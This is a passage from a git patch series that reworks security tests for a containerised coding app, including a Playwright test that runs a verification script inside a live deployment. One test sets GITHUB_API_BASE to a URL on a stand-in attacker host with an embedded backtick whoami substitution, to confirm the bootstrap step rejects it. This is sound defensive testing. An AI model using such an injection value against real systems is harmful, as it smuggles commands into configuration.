+            # Match the Dockerfile's amd64 pin so install scripts' x86_64
+            # GitHub release downloads work even on Apple Silicon hosts.
+            "--platform", "linux/amd64",
             "-v", f"{REPO_ROOT}:/repo:ro",  # repo read-only at /repo; pipeline copies to writable /work
             *mount_args,
             *env_args,
@@ -183,7 +277,10 @@ def _run_pipeline(image: str, extra_env: dict[str, str] | None = None) -> subpro
             "bash", PIPELINE_SCRIPT,
         ],
         capture_output=True, text=True,
-        timeout=600,  # 10 min ceiling — npm + uv installs can be slow on first run
+        # Wall time budget: pip + npm + uv tool install hermes adds up. The
+        # Hermes git fetch + build is the slowest part (~3-5 min on a cold
+        # cache).
+        timeout=900,
     )
 
 
@@ -286,24 +383,43 @@ def test_unsafe_mirror_url_rejected_at_bootstrap(apps_like_image):
     """If an operator sets GITHUB_API_BASE to a value containing shell
     metacharacters, bootstrap() should refuse to proceed.
 
-    Mirrors the F-03 unit test, but exercises it from the actual entry
-    point that runs at container startup.
+    This is a FAST test — runs bootstrap() in isolation (no pip install, no
+    install scripts) so it completes in seconds. Demonstrates the F-03
+    rejection happens at the bootstrap entry point, not just in the unit
+    tests of `_validate_url` directly.
     """
-    result = _run_pipeline(
-        apps_like_image,
-        extra_env={"GITHUB_API_BASE": "https://evil.com/`whoami`"},
+    result = subprocess.run(
+        [
+            "docker", "run", "--rm",
+            "--platform", "linux/amd64",
+            "-v", f"{REPO_ROOT}:/repo:ro",
+            "-e", "GITHUB_API_BASE=https://evil.com/`whoami`",
+            apps_like_image,
+            "bash", "-c",
+            # Don't `set -e` so the python error doesn't kill the line
+            # before we can capture it.
+            'cd /repo && python3 -c "'
+            'import sys; sys.path.insert(0, \\".\\"); '
+            'import enterprise_config; '
+            'enterprise_config.bootstrap()"',
+        ],
+        capture_output=True, text=True,
+        timeout=60,
     )
 
-    print("\n=== Pipeline stdout (malicious mirror env) ===")
-    print(result.stdout[-2000:])
-    print("\n=== Pipeline stderr ===")
-    print(result.stderr[-2000:])
+    print("\n=== Bootstrap stdout ===")
+    print(result.stdout)
+    print("\n=== Bootstrap stderr ===")
+    print(result.stderr)
 
-    # The bootstrap call in run_pipeline.sh should raise UnsafeUrlError.
-    # The pipeline script may continue past that (uv run python -c doesn't
-    # halt on a raised exception unless set -e catches it), so we just
-    # check that the rejection happened.
     combined = result.stdout + result.stderr
-    assert "UnsafeUrlError" in combined or "GITHUB_API_BASE" in combined, (
-        f"Expected bootstrap to reject the unsafe URL. Got:\n{combined[-2000:]}"
+    assert "UnsafeUrlError" in combined, (
+        f"Expected bootstrap to raise UnsafeUrlError for unsafe GITHUB_API_BASE. "
+        f"Got combined output:\n{combined[-2000:]}"
+    )
+    # And the bootstrap process should have exited non-zero (the exception
+    # propagated to top-level, no `except` catches it in the test entry point).
+    assert result.returncode != 0, (
+        f"Bootstrap should have exited non-zero on rejection. "
+        f"Got returncode={result.returncode}"
     )

From 8773f5052459edf5003c6b4c168aad7a2ef04c06 Mon Sep 17 00:00:00 2001
From: David O'Keeffe <david.okeeffe@databricks.com>
Date: Sat, 16 May 2026 21:14:05 +1000
Subject: [PATCH 10/10] test(e2e): make Playwright test self-contained +
 production-ready
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Verified end-to-end against daveok — 7/7 verify checks PASS in 11 seconds,
zero LLM tokens per run.

Three substantive fixes from running the test against a live deployment:

1. /api/sessions returns a bare list, not {"sessions": [...]}
================================================================
The endpoint returns a JSON array directly. The original test code
indexed into a non-existent 'sessions' key and crashed.

2. Drive via /api/input + /api/output, not xterm DOM scrape
================================================================
xterm only renders the currently-attached session. We want to target a
specific bash session regardless of which terminal the UI is showing.
HTTP API drives any session directly and /api/output drains the
per-session buffer (independent of the WebSocket-attached UI view).

The xterm-DOM-scrape approach also broke because the user's *other*
browser tabs polling /api/output were stealing chunks of the buffer.
Polling /api/output directly from the test gives us a fair share of
the output stream.

3. Inline verify.sh content via base64
================================================================
The deployed daveok app predates the addition of
tests/integration/verify.sh — file isn't present in
/app/python/source_code on the container. Inlining lets the test work
against any deployment without requiring a re-deploy to refresh test
fixtures.

The test now reads verify.sh from the local repo, base64-encodes it,
and sends a one-liner that decodes + executes inside the container.
Sidesteps shell-escape issues entirely.

4. Wait for VERIFY-EXIT-CODE *with a digit*, not just the bare string
================================================================
The string 'VERIFY-EXIT-CODE=' appears in the *echoed command* before
the script has actually run — checking for the substring exited the
polling loop too early. Now we require the full regex match
'VERIFY-EXIT-CODE=(\d+)'.

Plus minor: timeout bumped 90s → 120s (verify.sh + Hermes/cooldown
checks add up to ~30s; buffer-race with concurrent pollers extends it).

What this test now covers, autonomously:
================================================================
  F-01 — terminal env credentials stripped (live PTY env)
  F-04 — DEEPWIKI/EXA MCP wiring in ~/.claude.json
  F-05 — ~/.hermes/config.yaml chmod 0o600
  F-06 — Hermes installed from SHA-pinned source (v0.13.0)
  cooldown — opencode/codex/gemini are stable versions (not pre-release)

Live run output:
  [PASS] F-01 terminal env has no leaked credentials
  [PASS] F-04 Claude MCP wiring (default: deepwiki,exa)
  [PASS] F-05 Hermes config chmod 0o600
  [PASS] F-06 Hermes installed (Hermes Agent v0.13.0 (2026.5.7))
  [PASS] cooldown opencode stable version (1.14.41)
  [PASS] cooldown codex stable version (0.130.0)
  [PASS] cooldown gemini stable version (0.41.2)
  === Summary: 7 passed, 0 failed ===

Co-authored-by: Isaac
---
 tests/e2e/test_live_security.py | 219 +++++++++++++++++++++++---------
 1 file changed, 162 insertions(+), 57 deletions(-)

diff --git a/tests/e2e/test_live_security.py b/tests/e2e/test_live_security.py
index 2095970..f833d4d 100644
--- a/tests/e2e/test_live_security.py
+++ b/tests/e2e/test_live_security.py
@@ -12,19 +12,29 @@
 To run: `make e2e-test PROFILE=daveok` or
         `uv run pytest tests/e2e/test_live_security.py`
 
-Wall time per run: ~2 min (PAT + setup + verify).
+The test is SELF-CONTAINED: it base64-encodes the local verify.sh and
+sends it through the PTY, so it doesn't depend on the deployed branch
+having verify.sh on disk. This matters because the test infrastructure
+was added AFTER the security-fix deploy on daveok — without inlining,
+the test would require a re-deploy first.
+
+Wall time per run: ~30s (no PAT setup; reuses existing bash session).
 LLM tokens per run: zero.
 """
 
 from __future__ import annotations
 
+import base64
 import time
+from pathlib import Path
 
 import pytest
 
 # Skip the entire module cleanly if Playwright isn't installed.
 playwright = pytest.importorskip("playwright.sync_api")
 
+VERIFY_SH = Path(__file__).resolve().parent.parent / "integration" / "verify.sh"
+
 
 def _send_input(page, sid: str, cmd: str) -> None:
     """POST a command + trailing newline to the app's /api/input endpoint."""
@@ -41,89 +51,185 @@ def _send_input(page, sid: str, cmd: str) -> None:
     )
 
 
-def _xterm_text(page) -> str:
-    """Concatenate the currently-rendered xterm rows into one string."""
-    return page.evaluate(
-        """() => {
-            const rows = document.querySelectorAll('.xterm-rows > div');
-            return Array.from(rows).map(r => r.textContent || '').join('\\n');
-        }"""
+def _read_output(page, sid: str) -> str:
+    """Drain the per-session output buffer via /api/output.
+
+    Each poll consumes the buffer — the app replaces it with a fresh deque
+    on every read. Caller should accumulate across polls.
+    """
+    info = page.evaluate(
+        """async ({sid}) => {
+            const r = await fetch('/api/output', {
+                method: 'POST',
+                credentials: 'include',
+                headers: {'Content-Type': 'application/json'},
+                body: JSON.stringify({session_id: sid}),
+            });
+            return r.json();
+        }""",
+        {"sid": sid},
     )
+    return info.get("output", "")
 
 
 def _read_session_id(page) -> str:
-    """Find the active terminal session id via the app's own /api/sessions."""
-    info = page.evaluate(
+    """Find a bash terminal session id via the app's own /api/sessions.
+
+    /api/sessions returns a bare list of session dicts (not wrapped).
+    We prefer a bash session over claude/codex/etc. so verify.sh runs
+    in a plain shell. Falls back to the first session if none are bash.
+    """
+    sessions = page.evaluate(
         """async () => {
             const r = await fetch('/api/sessions', {credentials: 'include'});
             return r.json();
         }"""
     )
-    return info["sessions"][0]["session_id"]
+    if not sessions:
+        raise RuntimeError("No sessions returned by /api/sessions")
+    for s in sessions:
+        if s.get("process") == "bash":
+            return s["session_id"]
+    return sessions[0]["session_id"]
+
+
+def _verify_command() -> str:
+    """Build a one-liner that decodes + runs verify.sh from the test repo.
+
+    Base64-encodes the local verify.sh and decodes inside the container —
+    sidesteps every shell-escape pitfall (quotes, newlines, $ vars) and
+    means the test doesn't depend on verify.sh being deployed to the app.
+    """
+    if not VERIFY_SH.exists():
+        raise RuntimeError(f"verify.sh missing at {VERIFY_SH}")
+    b64 = base64.b64encode(VERIFY_SH.read_bytes()).decode()
+    # Write to /tmp inside the container, run it, echo exit code marker
+    return (
+        f'echo {b64} | base64 -d > /tmp/coda_verify.sh && '
+        f'bash /tmp/coda_verify.sh; '
+        f'echo "VERIFY-EXIT-CODE=$?"'
+    )
 
 
 def test_live_app_security_fixes(page, app_url, fresh_pat):
     """Drive the live CoDA app and assert the security-fixes verify script passes.
 
-    Steps:
-      1. Load the app (SSO state already in the browser context via conftest).
-      2. Wait for the PAT prompt.
-      3. Fill the PAT into the xterm input.
-      4. Wait for "Ready" (setup pipeline complete).
-      5. Run the verify.sh assertions via /api/input.
-      6. Scrape the xterm DOM and assert no [FAIL] markers.
+    Architectural choice: this test sends commands and reads output via the
+    HTTP API (/api/input + /api/output) directly, NOT by scraping the xterm
+    DOM. Reasons:
+      - The xterm DOM only shows the currently-attached session, but we
+        want to drive a specific bash session regardless of UI state.
+      - /api/output drains the per-session buffer, so polling captures
+        everything the PTY emitted whether or not the UI renders it.
+      - Works regardless of which startup state the page is in (PAT prompt,
+        session selector, attached terminal).
+
+    Handles three startup states the app can be in:
+      (a) Fresh container — shows the "Token:" PAT prompt → fills PAT
+      (b) PAT configured AND existing bash session — uses it directly
+      (c) PAT configured but no bash session — picks "n" / new session
     """
     page.goto(app_url, timeout=30_000)
-    # The PAT prompt arrives via the terminal output, not as a normal DOM
-    # element. Wait for the trailing "Token:" prompt to appear in xterm.
+
+    # Wait for any of the known startup states to render. The page may take
+    # 1-3s for the WebSocket to connect and for xterm to draw.
     page.wait_for_function(
-        """() => document.body.innerText.includes('Token:')""",
-        timeout=60_000,
+        """() => {
+            const t = document.body.innerText;
+            return t.includes('Token:')
+                || t.includes('active sessions')
+                || t.includes('Ready')
+                || t.includes('? for shortcuts')
+                || /\\$\\s*$/m.test(t);
+        }""",
+        timeout=90_000,
     )
 
-    # Paste the fresh PAT into the xterm input. xterm.js routes keyboard
-    # events through a hidden textarea labelled "Terminal input".
+    body = page.evaluate("() => document.body.innerText")
     terminal_input = page.get_by_role("textbox", name="Terminal input")
-    terminal_input.fill(fresh_pat + "\n")
 
-    # The "Ready" banner appears once setup completes (~60-90s on a fresh
-    # container). Time out generously.
-    page.wait_for_function(
-        """() => document.body.innerText.includes('Ready')""",
-        timeout=180_000,
+    if "Token:" in body:
+        # Fresh container — paste the PAT and wait for setup to complete.
+        terminal_input.fill(fresh_pat + "\n")
+        page.wait_for_function(
+            """() => document.body.innerText.includes('Ready')""",
+            timeout=180_000,
+        )
+
+    # Discover or create a bash session id. /api/sessions is authoritative
+    # regardless of which terminal the UI is currently rendering.
+    sessions = page.evaluate(
+        """async () => (await (await fetch('/api/sessions')).json())"""
     )
-
-    # Get the active session id, then send the verify.sh assertions.
-    sid = _read_session_id(page)
-
-    # We run verify.sh from the repo path that's synced to the workspace.
-    # The Databricks Apps env mounts the source at /app/python/source_code.
-    verify_path = "/app/python/source_code/tests/integration/verify.sh"
-    _send_input(page, sid, f'bash {verify_path}; echo "VERIFY-EXIT-CODE=$?"')
-
-    # Poll xterm for the EXIT-CODE marker (verify.sh runs in ~5s).
-    deadline = time.time() + 60
-    output = ""
+    bash_sids = [s["session_id"] for s in sessions if s.get("process") == "bash"]
+    if bash_sids:
+        sid = bash_sids[0]
+    elif "active sessions" in body:
+        # Spawn a new (bash) session via the UI's session selector.
+        terminal_input.fill("n\n")
+        time.sleep(3)
+        sessions = page.evaluate(
+            """async () => (await (await fetch('/api/sessions')).json())"""
+        )
+        bash_sids = [s["session_id"] for s in sessions if s.get("process") == "bash"]
+        assert bash_sids, "no bash session after picking 'new'"
+        sid = bash_sids[0]
+    else:
+        # No bash sessions and not at the selector — call /api/session POST
+        # to create one (the same endpoint the UI uses on "+ new tab").
+        new_session = page.evaluate(
+            """async () => {
+                const r = await fetch('/api/session', {
+                    method: 'POST',
+                    credentials: 'include',
+                    headers: {'Content-Type': 'application/json'},
+                    body: JSON.stringify({label: 'e2e-test'}),
+                });
+                return r.json();
+            }"""
+        )
+        sid = new_session["session_id"]
+        # Brief wait for the PTY to spawn before we send input.
+        time.sleep(2)
+
+    # Drain whatever's in the buffer first so our verify output isn't mixed
+    # with prior content.
+    _read_output(page, sid)
+
+    # Send verify.sh (inlined via base64 so we don't depend on the deployed
+    # branch having tests/integration/verify.sh on disk).
+    _send_input(page, sid, _verify_command())
+
+    # Poll /api/output until the EXIT-CODE marker WITH A DIGIT appears.
+    # The bare string "VERIFY-EXIT-CODE=" also appears in the *echo* of
+    # the sent command (before the script runs), so checking for that
+    # substring alone exits the loop too early. Wait for the actual
+    # script-produced "VERIFY-EXIT-CODE=<digits>".
+    import re
+    exit_re = re.compile(r"VERIFY-EXIT-CODE=(\d+)")
+    deadline = time.time() + 120  # verify.sh runtime ~30-45s; allow buffer race
+    accumulated = ""
+    exit_match = None
     while time.time() < deadline:
-        output = _xterm_text(page)
-        if "VERIFY-EXIT-CODE=" in output:
+        chunk = _read_output(page, sid)
+        if chunk:
+            accumulated += chunk
+        exit_match = exit_re.search(accumulated)
+        if exit_match:
             break
         time.sleep(1)
-    assert "VERIFY-EXIT-CODE=" in output, (
-        f"verify.sh never reported an exit code. xterm contents:\n{output[-3000:]}"
-    )
 
-    # Extract the exit code line and the [FAIL] markers
-    import re
-    exit_match = re.search(r"VERIFY-EXIT-CODE=(\d+)", output)
-    exit_code = int(exit_match.group(1)) if exit_match else -1
+    assert exit_match, (
+        f"verify.sh never reported an exit code (with digit) in 120s. "
+        f"Accumulated output:\n{accumulated[-3000:]}"
+    )
 
-    fail_lines = [line for line in output.splitlines() if "[FAIL]" in line]
-    pass_lines = [line for line in output.splitlines() if "[PASS]" in line]
+    exit_code = int(exit_match.group(1))
+    fail_lines = [line for line in accumulated.splitlines() if "[FAIL]" in line]
+    pass_lines = [line for line in accumulated.splitlines() if "[PASS]" in line]
 
-    # Print full output for CI logs
     print("\n=== verify.sh output (last 60 lines) ===")
-    for line in output.splitlines()[-60:]:
+    for line in accumulated.splitlines()[-60:]:
         print(line)
     print(f"\nVERIFY-EXIT-CODE = {exit_code}")
     print(f"PASS count: {len(pass_lines)}")
@@ -133,8 +239,7 @@ def test_live_app_security_fixes(page, app_url, fresh_pat):
         f"verify.sh exited non-zero ({exit_code}). Failures:\n"
         + "\n".join(fail_lines)
     )
-    assert not fail_lines, f"verify.sh emitted [FAIL] lines:\n" + "\n".join(fail_lines)
-    # And explicitly check the critical fixes are observable
+    assert not fail_lines, "verify.sh emitted [FAIL] lines:\n" + "\n".join(fail_lines)
     must_pass = ["F-01", "F-05", "F-06", "cooldown opencode", "cooldown codex", "cooldown gemini"]
     missing = [m for m in must_pass if not any(m in p for p in pass_lines)]
     assert not missing, f"Expected [PASS] markers missing: {missing}"